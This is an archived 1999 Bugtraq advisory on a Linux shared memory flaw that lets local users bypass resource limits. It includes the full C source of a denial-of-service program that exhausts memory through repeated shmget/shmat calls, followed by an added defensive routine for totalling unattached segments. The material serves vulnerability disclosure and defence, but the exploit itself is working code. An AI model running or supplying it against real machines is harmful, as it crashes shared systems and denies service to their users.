Bugtraq mailing list archives
KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability
From: shadow () KKI PL (Robert 'Shadow' Pająk)
Date: Tue, 14 Sep 1999 16:20:21 +0200
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

KKI Security Team                      Cracow Commercial Internet
http://www.security.kki.pl             http://www.kki.pl
mailto:security () security kki pl     mailto:biuro () kki pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Report title        : Shared Memory DoS - IPC vulnerability
                      (Linux abuse as example)
Problem found by    : Robert Pajak (shadow () security kki pl),
                      probably other ppl found that first - one of them
                      is lcamtuf, Solar Designer is probably other...
Report created by   : Robert Pajak (shadow () security kki pl)
                      Lukasz Luzar (lluzar () security kki pl)
Report published    : 14 September, 1999
Report code         : KKIS.14091999.004.b
Vulnerable programs : system vulnerability...
Systems affected    : Linux, other (?) ...
Archive             : http://www.security.kki.pl/advisories/
Risk level          : high

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Using the attached program one can DoS a machine even when limits are set
up... This is due to the fact that shared memory segments can exist without
being bound to processes. To protect yourself you should disable these
operations, or use Solar Designer's stack patch with limits set, etc...

Alan Cox has been notified...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Local Denial of Service attack - simple bypassing of limits...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* SharedDream - (c) Shadow, KKI Security                           */
/*                                                                  */
/* I'm not responsible for any damage done by this proggie...       */
/* It should be used only for education...                          */
/* To protect - use brain, Solar's patches, or whatever...          */
/* This problem is because shared memory segments can exist even    */
/* if they are not combined with programs!                          */
/* !This program will crash your machine (locally) at kernels 2.x!  */
/* If you are on kernels 2.2.x with limits run it twice :)          */
/* really - even when resource limits are set! :)                   */
/* Probably original idea by lcamtuf                                */
/* heck you should have told me that you found it                   */
/* first ;)                                                         */
/* heh - worm greetings for Coding Style ;)                         */

#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

#define BOLD "\033[00;04m"
#define BLUE "\033[00;36m"
#define STAN "\033[00;00m"

void main(void)
{
  char *p;
  int i = 10000000;

  printf("\n\n");
  printf(BOLD "*)" BLUE " SharedDream"STAN" - shared memory segments abuser\n");
  printf(BOLD "*)\n" STAN);
  printf(BOLD "*)" STAN " (c) 1999" BOLD " Shadow " STAN "(" BOLD "shadow () security kki pl" STAN ")\n");
  printf(BOLD "*)" STAN " greetz to " BOLD " vision (yo remember me), lcamtuf, kodzak, #??? ppl, Lam3rz, daworm, Trolinka, viedzmin other folks i forgot to mention\n" STAN);
  printf(BOLD "*)" STAN " Now it will eat up your memory even if it seems to be limited\n");
  printf(BOLD "*)" STAN " Starting..."); fflush(stdout);

  while (1) {
    if (p = shmat(shmget(0, i, 0777), 0, 0)) {
      memset( p,'\0',i); // need to touch memory somehow
      printf(".DoW."); fflush(stdout);
    } else {
      i--;
    }
  }
  exit(0);
}

~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.

All questions please address to mailto:security () security kki pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
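
A defender's view of the condition the advisory describes (segments that stay allocated with no process attached), as an added example that is not part of the original advisory: it totals unattached segments for one owner uid. The sample rows are constructed, the column order is that of `/proc/sysvipc/shm` on current Linux kernels, and `orphaned_for_uid` and `struct orphan_total` are hypothetical names.

```c
/* Added example (not from the advisory): total the SysV shared memory
 * segments that no process has attached (nattch == 0) for one owner uid. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample in the column order of Linux /proc/sysvipc/shm:
 * key shmid perms size cpid lpid nattch uid gid cuid cgid atime dtime ctime rss swap */
static const char SAMPLE[] =
    "       key      shmid perms       size  cpid  lpid nattch   uid   gid  cuid  cgid      atime      dtime      ctime        rss       swap\n"
    "         0          0   777   10000000  4211  4211      0  1001  1001  1001  1001  937318821  937318822  937318821   10000000          0\n"
    "         0      32769   777   10000000  4211  4211      0  1001  1001  1001  1001  937318823  937318824  937318823   10000000          0\n"
    "1392508978      65538   600       4096   812   903      2  1000  1000  1000  1000  937310000          0  937300000       4096          0\n";

struct orphan_total { unsigned segments; unsigned long long bytes; };

/* Sum segments owned by want_uid whose attach count is zero. Lines that do
 * not start with eight numeric fields (such as the header) are skipped. */
struct orphan_total orphaned_for_uid(const char *text, unsigned want_uid)
{
    struct orphan_total t = {0, 0};
    for (const char *line = text; line && *line; ) {
        long key; int shmid;
        unsigned perms, cpid, lpid, uid;
        unsigned long long size; unsigned long nattch;
        if (sscanf(line, "%ld %d %o %llu %u %u %lu %u", &key, &shmid, &perms,
                   &size, &cpid, &lpid, &nattch, &uid) == 8 &&
            nattch == 0 && uid == want_uid) {
            t.segments++;
            t.bytes += size;
        }
        line = strchr(line, '\n');      /* advance to the next line */
        if (line) line++;
    }
    return t;
}

int main(int argc, char **argv)
{
    static char buf[1 << 16];
    const char *text = SAMPLE;          /* default: the constructed sample */
    FILE *f = argc > 2 ? fopen(argv[2], "r") : NULL; /* e.g. /proc/sysvipc/shm */
    if (f) { buf[fread(buf, 1, sizeof buf - 1, f)] = '\0'; fclose(f); text = buf; }
    unsigned uid = argc > 1 ? (unsigned)strtoul(argv[1], NULL, 10) : 1001;
    struct orphan_total t = orphaned_for_uid(text, uid);
    printf("uid %u: %u unattached segment(s), %llu bytes\n", uid, t.segments, t.bytes);
    return 0;
}
```

Segments it reports can be inspected with `ipcs -m` and removed with `ipcrm -m <shmid>`.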